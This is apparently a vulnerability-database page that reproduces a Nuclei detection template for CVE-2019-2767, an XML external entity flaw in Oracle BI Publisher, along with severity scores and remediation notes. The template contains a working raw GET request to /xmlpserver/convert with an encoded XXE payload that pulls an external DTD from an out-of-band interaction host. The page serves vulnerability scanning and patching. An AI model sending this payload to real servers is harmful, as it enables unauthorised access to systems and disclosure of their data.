Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-2767
HistoryJun 08, 2021 - 4:19 p.m.

Oracle Business Intelligence Publisher - XML External Entity Injection

2021-06-0816:19:35
ProjectDiscovery
github.com
45
oracle
business intelligence
publisher
cve-2019-2767
xml
external entity injection
vulnerability
exploit-db
network access
http
patches
security advisory

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

AI Score

7.2

Confidence

High

EPSS

0.15

Percentile

95.8%

Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.

id: CVE-2019-2767

info:
  name: Oracle Business Intelligence Publisher - XML External Entity Injection
  author: madrobot
  severity: high
  description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system.
  remediation: |
    Apply the latest security patches provided by Oracle to fix this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/46729
    - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/vah13/Oracle-BI-bugs
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2019-2767
    epss-score: 0.14972
    epss-percentile: 0.95807
    cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: bi_publisher
  tags: cve,cve2019,edb,oracle,xxe,oast

http:
  - raw:
      - |
        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100ab53a30541dfa06c226087687709439be0aad2b92957273557b87fb5324093d40220468aa50188a9aef751c4da2d9a67d2d9b3e9d4cba73a2b0b43802ea1eb77db0b:922c64590222798bb761d5b6d8e72950

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

AI Score

7.2

Confidence

High

EPSS

0.15

Percentile

95.8%

Related for NUCLEI:CVE-2019-2767